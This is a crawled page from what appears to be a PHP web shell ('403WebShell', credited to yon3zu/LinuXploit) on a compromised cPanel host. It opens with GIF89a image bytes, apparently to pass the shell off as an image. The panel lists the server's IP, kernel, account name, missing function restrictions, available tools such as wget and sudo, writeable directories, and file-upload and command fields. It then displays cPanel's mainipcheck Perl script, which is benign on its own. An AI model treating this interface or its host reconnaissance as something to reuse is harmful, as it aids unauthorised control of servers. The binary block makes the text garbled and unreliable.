GIF89a=( �' 7IAXKgNgYvYx\%wh&h}t�h%�s%x�}9�R��&�0%� (�.��5�SD��&�a)�x5��;ͣ*ȡ&ղ)ׯ7׵<ѻ4�3�H֧KͯT��Y�aq��q��F� !� ' !� NETSCAPE2.0 , =( ��pH,�Ȥr�l:xШtJ�Z�جv��z��xL.:��z�n���|N�����~�������& !�0`9R�}��"�"a:S�~x��������g���E�������R���E����B�� ��ȸ��D���"�Ů� �H��L��D٫D�B�����D���T���H �G��A R�ڐ |�� ٭&��E8�S�kG�A�px�a��� R2XB��E8I���6X�:vT)�~��q�賥��"F~%x� � 4#Z�0O|-4Bs�X:= Q� Sal��yXJ`GȦ|s h��K3l7�B|�$'7Jީܪ0!��D�n=�P� ����0`�R�lj����v>���5 �.69�ϸd�����nlv�9��f{���Pbx �l5}�p� ��� �3a���I�O����!ܾ���i��9��#��)p�a ޽ �{�)vm��%D~ 6f��s}Œ�D�W E�`!� �&L8x� �ܝ{)x`X/>�}m��R�*|`D�=�_ ^�5 !_&'a�O�7�c��`DCx`�¥�9�Y�F���`?��"� �n@`�} lď��@4>�d S �v�xN��"@~d��=�g�s~G��� ���ud &p8Q�)ƫlXD����A~H�ySun�j���k*D�LH�] ��C"J��Xb~ʪwSt}6K,��q�S:9ت:���l�@�`�� �.۬�t9�S�[:��=`9N����{¿�A !R�:���6��x�0�_ �;������^���#����!����U���;0L1�����p% A��U̬ݵ��%�S��!���~`�G���� ���=4�np�3���������u�u�ٮ|%2�I��r�#0��J``8�@S@5� ���^`8E�]�.�S���7 � �0�j S�D� z���i�S�����!���l��w9*�D�I�nEX��� &A�Go�Qf��F��;���}�J����F5��Q|���X��T��y���]� o ��C=��:���PB@ D׽S�(>�C�x}`��xJЬ�۠��p+eE0`�}`A �/NE�� �9@��� H�7�!%B0`�l*��!8 2�%� �:�1�0E��ux%nP1�!�C)�P81l�ɸF#Ƭ{����B0>�� �b�`��O3��()yRpb��E.ZD8�H@% �Rx+%���c� ���f��b�d�`F�"8�XH"��-�|1�6iI, 2�$+](A*j� QT�o0.�U�`�R�}`�SN����yae�����b��o~ S)�y�@��3 �tT�0�&�+~L�f"�-|�~��>!�v��~�\Q1)}@�}h#aP72�"�$ !� " , =( &7IAXG]KgNgYvYxR"k\%w]'}h}t�h%�g+�s%r.m3ax3�x�}9��&��+�!7�0%� (�.�SD��&��;�"&ײ)׻4��6�K� �@pH,�Ȥr�l:xШtJ�Z�جv��z��xL.:��z�n���|N�����~�������& !�0`9R�}��"�"a:S�~x��������g �� E �� �������E �´��C���ǶR��D��"Ʒ�ʱH��M��GڬD�B����D��T����G���C�C� l&�~:'�tU�6ɹ#��)�'�.6�&��Ȼ K(8p0N�?!�2"��NIJX>R��OM '��2�*x�>#n� �@<[:�I�f ��T���Cdb��[�}E�5MBo��@�`@��tW-3 �x�B���jI�&E�9[T&$��ﯧ&"s��ȳ����dc�UUρ#���ldj?����`\}���u|3'�R]�6 �S#�!�FKL�*N E���`$�:e�YD�q�.�촁�s \-�jA 9�����-��M[�x(�s��x�|���p��}k�T�DpE@W� ��]k`1� ���Yb ��0l��*n0��"~zBd�~u�7�0Bl��0-�x~|U�U0 �h�*HS�|��e"#"?vp�i`e6^�+q��`m8 #V�� ��VS|`��"m"сSn|@:U���~`pb�G�ED����2F�I�? >�x� R� ��%~jx��<�a�9ij�2�D��&: Z`�]w���:�6��B�7eFJ|�ҧ�,���FǮcS�ʶ+B�,�ܺN���>PAD�HD��~���n��}�#�� Q��S���2�X�{�k�lQ�2�����w�|2� h9��G�,m���3��6-��E�L��I�³*K���q�`DwV�QXS��peS��� qܧTS����R�u �<�a�*At�lmE� � ��N[P1�ۦ��$��@`��Dpy�yXvCAy�B`}D� 0QwG#� �a[^�� $���Ǧ{L�"[��K�g�;�S~��GX.�goT.��ư��x���?1z��x~:�g�|�L� ��S`��0S]P�^p F<""�?!,�!N4&P� ����:T�@h�9%t��:�-~�I<`�9p I&.)^ 40D#p@�j4�ج:�01��rܼF2oW�#Z ;$Q q  �K��Nl#29 !F@�Bh�ᏬL!XF�LHKh�.�hE&J�G��<"WN!�����Y@� >R~19J"�2,/ &.GXB%�R�9B6�W]���W�I�$��9�RE8Y� ��"�A5�Q.axB�&ة�J�! �t)K%tS-�JF b�NMxL��)�R��"���6O!TH�H� 0 !� ) , =( &AXKgNgYvYxR"k\%wh&h}h%�g+�s%r.x3�x�}9��&��+�R,�!7�0%� (�.��5��&�a)��;�"&ף*Ȳ)ׯ7׻4�3��6�H֧KͻH�T��Y��q��h� ��pH,�Ȥr�l:xШtJ�Z�جv��z��xL.:��z�n���|N�����~�������& !�0`9R�}��"�"a:S�~x��������g �� E$����� � ����$E$��"��D� � ������R��C��� E ��H�M��G�D� �B��ϾD��a��`1r��Ӑ�� �o~�zU!L�C'�yW�UGt����ll�0���uG�)A�s[��x� �xO%��X2�  P�n:R/��aHae+�Dm?# ǣ6�8�J�x�Di�M���j���5oQ7�- <! *�l��R2r/a!l)d� A"�E���� &� ;��c �%����b��pe~C"B���H�eF2��`8qb�t_`ur`e� w�u3��Pv�h""�`�Íx�LĹ��3� �~ֺ�:���MDfJ� �۵�W�%�S�X �؁)�@��:E��w�u�Sxb8y\m�zS��Zb�E�L��w!y(>�"w�=�|��s�d �C�W)H�cC$�L �7r.�\{)@�`@ �X�$PD `aaG:���O�72E�amn]�"Rc�x�R� &dR8`g��i�xLR!�P &d����T���i�|�_ � Qi�#�`g:��:noM� :V �)p����W&a=�e�k� j���1߲s�x�W�jal|0��B0�, \j۴:6���C ��W��|��9���zĸV {�;��n��V�m�I��.��PN� ����C��+��By�ѾHŸ:��� 7�Y�FTk�SaoaY$D�S���29R�kt� ��f� ��:��Sp�3�I��DZ� �9���g��u�*3)O��[_hv ,���Et x�BH� �[��64M@�S�M7d�l�ܶ5-��U܍��z�R3Ԭ3~ ��P��5�g: ���kN�&0�j4���#{��3S�2�K�'ợl���2K{� {۶?~m𸧠�I�nE�='����^���_�=��~�#O���'���o..�Y�n��CSO��a��K��o,���b�����{�C�� "�{�K ��w��Ozdը�:$ ���v�] A#� ���a�z)Rx׿ƥ�d``�w-�y�f�K!����|��P��=�`�(f��'Pa ��BJa%��f�%`�}F����6>��`G"�}�=�!o`�^FP�ةQ�C���`(�}\�ݮ ��$<��n@dĠE#��U�I�!� #l��9`k���'Rr��Z�NB�MF �[�+9���-�wj���8�r� ,V�h"�|�S=�G_��"E� 0i*%̲��da0mVk�):;&6p>�jK ��# �D�:�c?:R Ӭf��I-�"�<�="��7�3S��c2RW ,�8(T"P0F¡Jh�" ; 403WebShell
403Webshell
Server IP : 173.249.157.85  /  Your IP : 18.216.105.175
Web Server : Apache
System : Linux server.frogzhost.com 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64
User : econtech ( 1005)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /scripts/mainipcheck
#!/usr/local/cpanel/3rdparty/bin/perl

# cpanel - scripts/mainipcheck                     Copyright 2022 cPanel, L.L.C.
#                                                           All rights reserved.
# copyright@cpanel.net                                         http://cpanel.net
# This code is subject to the cPanel license. Unauthorized copying is prohibited

use strict;
use warnings;

package scripts::mainipcheck;

use Cpanel::IP::LocalCheck   ();
use Cpanel::IP::Loopback     ();
use Cpanel::Linux::RtNetlink ();
use Cpanel::LoadModule       ();
use Cpanel::Logger           ();
use Cpanel::NAT::Object      ();
use Cpanel::SafeRun::Object  ();
use Cpanel::FileUtils::Write ();
use Cpanel::LoadFile         ();
use Cpanel::DIp::LicensedIP  ();
use Cpanel::Exception        ();
use Socket                   ();

use Try::Tiny;

use Getopt::Long qw(GetOptionsFromArray);

our $MAINIP_FILE = '/var/cpanel/mainip';

exit( __PACKAGE__->script( \@ARGV ) ) unless caller();

sub script {
    my ( $class, $argv ) = @_;

    my $remote_check;
    GetOptionsFromArray(
        $argv,
        'remote-check' => \$remote_check,
    ) if defined $argv and ref $argv eq 'ARRAY';

    my $logger = Cpanel::Logger->new();

    my $mainip_file_contents = eval { Cpanel::LoadFile::loadfile($MAINIP_FILE) // '' };
    my $mainip               = $mainip_file_contents =~ s/\s+//gr;
    my $myip_url             = Cpanel::DIp::LicensedIP::myip_url();
    my $cpIP                 = Cpanel::DIp::LicensedIP::get_license_ip($myip_url);
    my $default_route_ip;
    my $update_mainip      = $mainip ne $mainip_file_contents;    # Clean up formatting of the file if true
    my $mainip_file_exists = -e $MAINIP_FILE;                     # No sense in stat-ing the file twice like we used to in certain scenarioes

    # Needed for NAT awareness, is NO-OP on non-NAT to these values (thus local and public IP values would be the same on non-nat systems).
    my $NAT_obj      = Cpanel::NAT::Object->new();
    my $NAT_local_ip = $NAT_obj->get_local_ip($cpIP);

    if ($remote_check) {
        print "$cpIP\n";
        return 0;
    }

    eval { $default_route_ip = get_ip_from_netlink() || get_ip_from_default_route(); };
    if ( my $error_message = $@ ) {
        chomp $error_message;
        $logger->warn("Encountered an error while determining the main IP from the default route: $error_message");
        ($mainip_file_exists) ? die "/var/cpanel/mainip exists. Bailing out..." : $logger->info("Proceeding with main IP check assuming that the IP address from $myip_url is the main IP address.");
        $default_route_ip = $mainip;    # XXX Should we keep going even here? I'm not sure.
    }
    my $NAT_public_ip = $NAT_obj->get_public_ip($default_route_ip);

    my $canonical_main_ip = $default_route_ip || $NAT_local_ip;
    if ( !$mainip_file_exists ) {
        $update_mainip = 1;             # I'm somewhat curious as to whether we'd wanna update SPF records here too, honestly.
    }
    elsif ( $canonical_main_ip ne $mainip ) {
        $update_mainip = 1;
        $logger->info("The Server's main IP address has changed from $mainip to $canonical_main_ip.");

        # At one point, the below condition turned $default_route_ip into $cpIP, causing logger warns to actually get suppressed
        # when they would normally be spuriously reported for NATted systems.
        # This is because all the check for the logger warn below used to be if $default_route_ip ne $cpIP.
        # This would never be true when we had to update the mainip previously.
        if ( !Cpanel::IP::LocalCheck::ip_is_on_local_server($cpIP) ) {
            $logger->warn("$cpIP is not bound to an interface on the system! Please verify your network configuration.");

            # This can trigger pretty trivially on NAT setups if your cpnat configuration is not built or in fact insane.
            # Just make /var/cpanel/cpnat contain non-ip strings as if they were a key=>value nat IP pair separated
            # by spaces if you want to see this in action.
        }

        # Ensure the license system has what it needs? Not sure how it gets the updated mainip or if it even needs it?
        _reprovision_license_authn();

        require Cpanel::ServerTasks;

        # Update SPF records, as we've changed to a new mainip
        Cpanel::ServerTasks::schedule_task( ['SPFTasks'], 5, 'update_all_users_spf_records' );
        $logger->info("Scheduled SPF record update");
    }

    if ($update_mainip) {
        Cpanel::FileUtils::Write::overwrite( $MAINIP_FILE, $canonical_main_ip, 0644 );
    }

    if ( !$NAT_obj->enabled && $default_route_ip ne $cpIP ) {
        $logger->warn("$myip_url detects system IP as $cpIP and system local IP detected as $default_route_ip. Please verify your network configuration.");
    }
    elsif ( $NAT_obj->enabled && $NAT_public_ip ne $cpIP && $NAT_local_ip ne $default_route_ip ) {

        # Entertaingly enough, in this instance, $NAT_local_ip always equals $cpIP and vice versa. Conveniently enough, it also catches all invalid NAT configs.
        $logger->warn("$myip_url detects a system IP address of $cpIP and system local IP address of $default_route_ip.");
        $logger->warn("This looks like a NAT setup, but these IP addresses do not correspond to values listed in /var/cpanel/cpnat.");
        $logger->info("The system will now rebuild your cpnat configuration to ensure system sanity.");
        _system('/usr/local/cpanel/scripts/build_cpnat');
    }

    return 0;
}

# For mocking in tests -- don't remove the 'uncoverable' comments below, as this impacts Devel::Cover reporting.
sub _system {

    # uncoverable subroutine
    return system @_;    # uncoverable statement
}

# Pick a testing IP and see how the kernel proposes routing it, then look up and return the source address which would be used.
sub get_ip_from_netlink {
    my $TEST_IP   = '208.74.123.2';    # TODO: Better way of picking an IP with high probability of not being routed specially?
    my $result_ip = '';

    try {
        my $routes_ar = Cpanel::Linux::RtNetlink::get_route_to( 'AF_INET', $TEST_IP );
        foreach my $route_info_hr (@$routes_ar) {
            if ( defined $route_info_hr->{'rta_dst'} && $route_info_hr->{'rta_dst'} eq $TEST_IP ) {
                $result_ip = $route_info_hr->{'rta_prefsrc'};
                last;
            }
        }
    }
    catch {
        Cpanel::Logger->new()->warn( 'Failed to retrieve IP via Netlink: ' . Cpanel::Exception::get_string_no_id($_) . "\nFalling back to reading /proc/net/route." );
    };

    return $result_ip;
}

# Get interface associated with default route and use socket() to get IP
sub get_ip_from_default_route {
    my $proc_route_path = shift || '/proc/net/route';    # For unit testing, mostly
    my %interfaces;

    if ( open my $proc_fh, '<', $proc_route_path ) {
        while ( my $line = readline $proc_fh ) {
            chomp $line;
            if ( $line =~ m/^(.+?)\s*0{8}\s.*?(\d+)\s+0{8}\s*(?:\d+\s*){3}$/ ) {
                my ( $interface, $metric ) = ( $1, $2 );
                push @{ $interfaces{$metric} }, $interface;
            }
        }
        close($proc_fh);
    }
    else {
        die("Unable to open $proc_route_path: $!");
    }

    my $lowest_metric = ( sort keys %interfaces )[0];
    my $interface     = $interfaces{$lowest_metric}[0];
    my $ip            = get_ip_from_interface($interface);

    # VPS issues
    if ( Cpanel::IP::Loopback::is_loopback($ip) && $interface =~ /^venet0?$/ ) {
        return get_ip_from_interface('venet0:0');
    }

    return $ip;
}

sub get_ip_from_interface {
    my $interface   = shift;
    my $SIOCGIFADDR = 0x8915;
    my $proto       = getprotobyname('ip');
    socket( my $socket_fh, &Socket::PF_INET, &Socket::SOCK_DGRAM, $proto ) or die("Socket error: $!");

    # struct ifreq is 16 bytes of name, null-padded, followed by 16 bytes of answer.
    my $ifreq = pack( 'a32', $interface );
    ioctl( $socket_fh, $SIOCGIFADDR, $ifreq ) or die("Error in ioctl: $!");
    my ( $if,   $sin )  = unpack( 'a16 a16', $ifreq );
    my ( $port, $addr ) = Socket::sockaddr_in($sin);
    my $ip;
    foreach my $family ( &Socket::AF_INET, &Socket::AF_INET6 ) {
        last if $ip;

        # Generally we'll favor ipv4 addresses over ipv6, but we should use the v6 if it is the only one available.
        $ip = Socket::inet_ntop( $family, $addr );
    }
    return $ip;
}

sub _reprovision_license_authn {

    Cpanel::LoadModule::load_perl_module('Cpanel::Market');
    Cpanel::Market::set_cpstore_is_in_sync_flag(0);
    #
    # This will cause the system to get new LicenseAuthn
    # credentials so we can connect to various cPanel systems
    # that require license-based authentication.
    #
    my $run = Cpanel::SafeRun::Object->new( 'program' => '/usr/local/cpanel/cpkeyclt' );
    warn $run->autopsy() if $run->CHILD_ERROR;

    #
    #  cpkeyclt will auto re-provision on the second run
    #  if the id changes
    #
    $run = Cpanel::SafeRun::Object->new(
        'program' => '/usr/local/cpanel/scripts/try-later',
        'args'    => [
            '--action',      '/usr/local/cpanel/cpkeyclt --quiet',
            '--check',       '/bin/sh -c exit 1',
            '--delay',       11,                                     # We only allow updates every 10 minutes so wait 11
            '--max-retries', 1,
            '--skip-first'
        ]
    );
    warn $run->autopsy() if $run->CHILD_ERROR;

    #
    #  If they changed the ip for the license in manage2 they keep the
    #  same liscid so we need to check after the license update has
    #  happened the second time
    #
    $run = Cpanel::SafeRun::Object->new(
        'program' => '/usr/local/cpanel/scripts/try-later',
        'args'    => [
            '--action',      '/usr/local/cpanel/bin/check_cpstore_in_sync_with_local_storage',
            '--check',       '/bin/sh -c exit 1',
            '--delay',       15,                                                                 # Must happen after the second license update
            '--max-retries', 1,
            '--skip-first'
        ]
    );
    warn $run->autopsy() if $run->CHILD_ERROR;

    return 1;

}

Youez - 2016 - github.com/yon3zu
LinuXploit